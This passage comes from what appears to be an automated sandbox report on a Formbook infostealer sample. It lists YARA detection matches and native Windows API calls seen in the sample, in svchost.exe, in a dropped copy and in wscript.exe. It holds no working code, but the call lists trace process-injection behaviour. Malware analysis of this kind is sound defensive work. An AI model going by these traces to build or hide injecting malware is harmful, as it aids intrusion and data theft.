Response Group Source: 14.2.sdv88p2lg.exe.2270000.2.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 14.2.sdv88p2lg.exe.2270000.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 14.2.sdv88p2lg.exe.2270000.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0.2.xg28sL5JDm.exe.23e0000.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0.2.xg28sL5JDm.exe.23e0000.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0.2.xg28sL5JDm.exe.23e0000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0.2.xg28sL5JDm.exe.23e0000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 3.2.xg28sL5JDm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 3.2.xg28sL5JDm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 14.2.sdv88p2lg.exe.2600000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 14.2.sdv88p2lg.exe.2600000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
 Contains functionality to call native functions Show sources
 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 0_2_00467724 NtdllDefWindowProc_A, 0_2_00467724 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 0_2_0045CA34 GetSubMenu,SaveDC,RestoreDC,7337B080,SaveDC,RestoreDC,NtdllDefWindowProc_A, 0_2_0045CA34 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 0_2_0044CEA0 NtdllDefWindowProc_A,GetCapture, 0_2_0044CEA0 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 0_2_0042D764 NtdllDefWindowProc_A, 0_2_0042D764 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 0_2_00467ECC IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A, 0_2_00467ECC Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 0_2_00467F7C IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus, 0_2_00467F7C Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_2_00416B50 NtCreateFile, 3_2_00416B50 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_2_00416C00 NtReadFile, 3_2_00416C00 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_2_00416C80 NtClose, 3_2_00416C80 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_2_00416D30 NtAllocateVirtualMemory, 3_2_00416D30 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_2_00416B4D NtCreateFile, 3_2_00416B4D Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_2_00416C7A NtClose, 3_2_00416C7A Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_2_00AAA2D0 NtClose,LdrInitializeThunk, 3_2_00AAA2D0 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_2_00AAA240 NtReadFile,LdrInitializeThunk, 3_2_00AAA240 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_2_00AAA3E0 NtFreeVirtualMemory,LdrInitializeThunk, 3_2_00AAA3E0 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_2_00AAA360 NtAllocateVirtualMemory,LdrInitializeThunk, 3_2_00AAA360 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_2_00AAA4A0 NtUnmapViewOfSection,LdrInitializeThunk, 3_2_00AAA4A0 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_2_00AAA480 NtMapViewOfSection,LdrInitializeThunk, 3_2_00AAA480 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_2_00AAA410 NtQueryInformationToken,LdrInitializeThunk, 3_2_00AAA410 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_2_00AAA5F0 NtReadVirtualMemory,LdrInitializeThunk, 3_2_00AAA5F0 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_2_00AAA560 NtQuerySystemInformation,LdrInitializeThunk, 3_2_00AAA560 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_2_00AAA540 NtDelayExecution,LdrInitializeThunk, 3_2_00AAA540 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_2_00AAA6A0 NtCreateSection,LdrInitializeThunk, 3_2_00AAA6A0 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_2_00AAA610 NtAdjustPrivilegesToken,LdrInitializeThunk, 3_2_00AAA610 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_2_00AAA720 NtResumeThread,LdrInitializeThunk, 3_2_00AAA720 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_2_00AAA700 NtProtectVirtualMemory,LdrInitializeThunk, 3_2_00AAA700 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_2_00AAA750 NtCreateFile,LdrInitializeThunk, 3_2_00AAA750 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_2_00AAB0B0 NtGetContextThread, 3_2_00AAB0B0 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_2_00AAA800 NtSetValueKey, 3_2_00AAA800 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_2_00AAA2F0 NtQueryInformationFile, 3_2_00AAA2F0 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_2_00AAA220 NtWaitForSingleObject, 3_2_00AAA220 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_2_00AABA30 NtSetContextThread, 3_2_00AABA30 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_2_00AAA260 NtWriteFile, 3_2_00AAA260 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_2_00AAA3D0 NtCreateKey, 3_2_00AAA3D0 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_2_00AAA310 NtEnumerateValueKey, 3_2_00AAA310 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_2_00AAA370 NtQueryInformationProcess, 3_2_00AAA370 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_2_00AAA350 NtQueryValueKey, 3_2_00AAA350 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_2_00AAACE0 NtCreateMutant, 3_2_00AAACE0 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_2_00AAA430 NtQueryVirtualMemory, 3_2_00AAA430 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_2_00AAB410 NtOpenProcessToken, 3_2_00AAB410 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_2_00AAA460 NtOpenProcess, 3_2_00AAA460 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_2_00AAA470 NtSetInformationFile, 3_2_00AAA470 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_2_00AAB470 NtOpenThread, 3_2_00AAB470 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_2_00AAA5A0 NtWriteVirtualMemory, 3_2_00AAA5A0 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_2_00AAA520 NtEnumerateKey, 3_2_00AAA520 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_2_00AABD40 NtSuspendThread, 3_2_00AABD40 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_2_00AAA6D0 NtCreateProcessEx, 3_2_00AAA6D0 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_2_00AAA650 NtQueueApcThread, 3_2_00AAA650 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_2_00AAA780 NtOpenDirectoryObject, 3_2_00AAA780 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_2_00AAA710 NtQuerySection, 3_2_00AAA710 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_1_00416B50 NtCreateFile, 3_1_00416B50 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_1_00416C00 NtReadFile, 3_1_00416C00 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_1_00416C80 NtClose, 3_1_00416C80 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_1_00416D30 NtAllocateVirtualMemory, 3_1_00416D30 Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A2D0 NtClose,LdrInitializeThunk, 5_2_02F6A2D0 Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A260 NtWriteFile,LdrInitializeThunk, 5_2_02F6A260 Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A240 NtReadFile,LdrInitializeThunk, 5_2_02F6A240 Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A3E0 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_02F6A3E0 Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A3D0 NtCreateKey,LdrInitializeThunk, 5_2_02F6A3D0 Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A360 NtAllocateVirtualMemory,LdrInitializeThunk, 5_2_02F6A360 Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A350 NtQueryValueKey,LdrInitializeThunk, 5_2_02F6A350 Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A310 NtEnumerateValueKey,LdrInitializeThunk, 5_2_02F6A310 Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A800 NtSetValueKey,LdrInitializeThunk, 5_2_02F6A800 Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A6A0 NtCreateSection,LdrInitializeThunk, 5_2_02F6A6A0 Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A610 NtAdjustPrivilegesToken,LdrInitializeThunk, 5_2_02F6A610 Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A750 NtCreateFile,LdrInitializeThunk, 5_2_02F6A750 Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6ACE0 NtCreateMutant,LdrInitializeThunk, 5_2_02F6ACE0 Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A480 NtMapViewOfSection,LdrInitializeThunk, 5_2_02F6A480 Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A470 NtSetInformationFile,LdrInitializeThunk, 5_2_02F6A470 Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A410 NtQueryInformationToken,LdrInitializeThunk, 5_2_02F6A410 Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A560 NtQuerySystemInformation,LdrInitializeThunk, 5_2_02F6A560 Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A540 NtDelayExecution,LdrInitializeThunk, 5_2_02F6A540 Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A2F0 NtQueryInformationFile, 5_2_02F6A2F0 Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6BA30 NtSetContextThread, 5_2_02F6BA30 Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A220 NtWaitForSingleObject, 5_2_02F6A220 Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A370 NtQueryInformationProcess, 5_2_02F6A370 Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6B0B0 NtGetContextThread, 5_2_02F6B0B0 Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A6D0 NtCreateProcessEx, 5_2_02F6A6D0 Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A650 NtQueueApcThread, 5_2_02F6A650 Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A780 NtOpenDirectoryObject, 5_2_02F6A780 Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A720 NtResumeThread, 5_2_02F6A720 Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A710 NtQuerySection, 5_2_02F6A710 Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A700 NtProtectVirtualMemory, 5_2_02F6A700 Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A4A0 NtUnmapViewOfSection, 5_2_02F6A4A0 Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6B470 NtOpenThread, 5_2_02F6B470 Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A460 NtOpenProcess, 5_2_02F6A460 Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A430 NtQueryVirtualMemory, 5_2_02F6A430 Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6B410 NtOpenProcessToken, 5_2_02F6B410 Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A5F0 NtReadVirtualMemory, 5_2_02F6A5F0 Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A5A0 NtWriteVirtualMemory, 5_2_02F6A5A0 Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6BD40 NtSuspendThread, 5_2_02F6BD40 Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A520 NtEnumerateKey, 5_2_02F6A520 Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_00416B50 NtCreateFile, 5_2_00416B50 Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_00416C00 NtReadFile, 5_2_00416C00 Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_00416C80 NtClose, 5_2_00416C80 Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_00416D30 NtAllocateVirtualMemory, 5_2_00416D30 Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_00416B4D NtCreateFile, 5_2_00416B4D Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_00416C7A NtClose, 5_2_00416C7A Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 14_2_022B2323 NtUnmapViewOfSection, 14_2_022B2323 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 14_2_022B2B39 NtResumeThread, 14_2_022B2B39 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 14_2_022B6BE1 NtMapViewOfSection, 14_2_022B6BE1 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 14_2_022B51A7 NtQueryInformationProcess, 14_2_022B51A7 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 14_2_022B31A6 NtQueryInformationProcess, 14_2_022B31A6 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 14_2_022B47C4 NtQueryInformationProcess, 14_2_022B47C4 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA2D0 NtClose,LdrInitializeThunk, 15_2_00ADA2D0 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA240 NtReadFile,LdrInitializeThunk, 15_2_00ADA240 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA3E0 NtFreeVirtualMemory,LdrInitializeThunk, 15_2_00ADA3E0 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA360 NtAllocateVirtualMemory,LdrInitializeThunk, 15_2_00ADA360 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA4A0 NtUnmapViewOfSection,LdrInitializeThunk, 15_2_00ADA4A0 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA480 NtMapViewOfSection,LdrInitializeThunk, 15_2_00ADA480 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA410 NtQueryInformationToken,LdrInitializeThunk, 15_2_00ADA410 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA5F0 NtReadVirtualMemory,LdrInitializeThunk, 15_2_00ADA5F0 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA560 NtQuerySystemInformation,LdrInitializeThunk, 15_2_00ADA560 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA540 NtDelayExecution,LdrInitializeThunk, 15_2_00ADA540 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA6A0 NtCreateSection,LdrInitializeThunk, 15_2_00ADA6A0 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA610 NtAdjustPrivilegesToken,LdrInitializeThunk, 15_2_00ADA610 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA720 NtResumeThread,LdrInitializeThunk, 15_2_00ADA720 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA700 NtProtectVirtualMemory,LdrInitializeThunk, 15_2_00ADA700 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA750 NtCreateFile,LdrInitializeThunk, 15_2_00ADA750 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADB0B0 NtGetContextThread, 15_2_00ADB0B0 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA800 NtSetValueKey, 15_2_00ADA800 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA2F0 NtQueryInformationFile, 15_2_00ADA2F0 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA220 NtWaitForSingleObject, 15_2_00ADA220 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADBA30 NtSetContextThread, 15_2_00ADBA30 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA260 NtWriteFile, 15_2_00ADA260 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA3D0 NtCreateKey, 15_2_00ADA3D0 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA310 NtEnumerateValueKey, 15_2_00ADA310 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA370 NtQueryInformationProcess, 15_2_00ADA370 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA350 NtQueryValueKey, 15_2_00ADA350 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADACE0 NtCreateMutant, 15_2_00ADACE0 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA430 NtQueryVirtualMemory, 15_2_00ADA430 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADB410 NtOpenProcessToken, 15_2_00ADB410 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA460 NtOpenProcess, 15_2_00ADA460 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADB470 NtOpenThread, 15_2_00ADB470 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA470 NtSetInformationFile, 15_2_00ADA470 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA5A0 NtWriteVirtualMemory, 15_2_00ADA5A0 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA520 NtEnumerateKey, 15_2_00ADA520 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADBD40 NtSuspendThread, 15_2_00ADBD40 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA6D0 NtCreateProcessEx, 15_2_00ADA6D0 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA650 NtQueueApcThread, 15_2_00ADA650 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA780 NtOpenDirectoryObject, 15_2_00ADA780 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA710 NtQuerySection, 15_2_00ADA710 Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1ACE0 NtCreateMutant,LdrInitializeThunk, 18_2_04A1ACE0 Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A560 NtQuerySystemInformation,LdrInitializeThunk, 18_2_04A1A560 Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A610 NtAdjustPrivilegesToken,LdrInitializeThunk, 18_2_04A1A610 Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A2D0 NtClose,LdrInitializeThunk, 18_2_04A1A2D0 Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A3E0 NtFreeVirtualMemory,LdrInitializeThunk, 18_2_04A1A3E0 Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A360 NtAllocateVirtualMemory,LdrInitializeThunk, 18_2_04A1A360 Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A4A0 NtUnmapViewOfSection, 18_2_04A1A4A0 Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A480 NtMapViewOfSection, 18_2_04A1A480 Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A430 NtQueryVirtualMemory, 18_2_04A1A430 Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A410 NtQueryInformationToken, 18_2_04A1A410 Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1B410 NtOpenProcessToken, 18_2_04A1B410 Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A460 NtOpenProcess, 18_2_04A1A460 Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1B470 NtOpenThread, 18_2_04A1B470 Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A470 NtSetInformationFile, 18_2_04A1A470 Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A5A0 NtWriteVirtualMemory, 18_2_04A1A5A0 Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A5F0 NtReadVirtualMemory, 18_2_04A1A5F0 Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A520 NtEnumerateKey, 18_2_04A1A520 Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1BD40 NtSuspendThread, 18_2_04A1BD40 Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A540 NtDelayExecution, 18_2_04A1A540 Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A6A0 NtCreateSection, 18_2_04A1A6A0 Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A6D0 NtCreateProcessEx, 18_2_04A1A6D0 Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A650 NtQueueApcThread, 18_2_04A1A650 Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A780 NtOpenDirectoryObject, 18_2_04A1A780 Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A720 NtResumeThread, 18_2_04A1A720 Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A700 NtProtectVirtualMemory, 18_2_04A1A700 Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A710 NtQuerySection, 18_2_04A1A710 Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A750 NtCreateFile, 18_2_04A1A750 Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1B0B0 NtGetContextThread, 18_2_04A1B0B0 Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A800 NtSetValueKey, 18_2_04A1A800 Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A2F0 NtQueryInformationFile,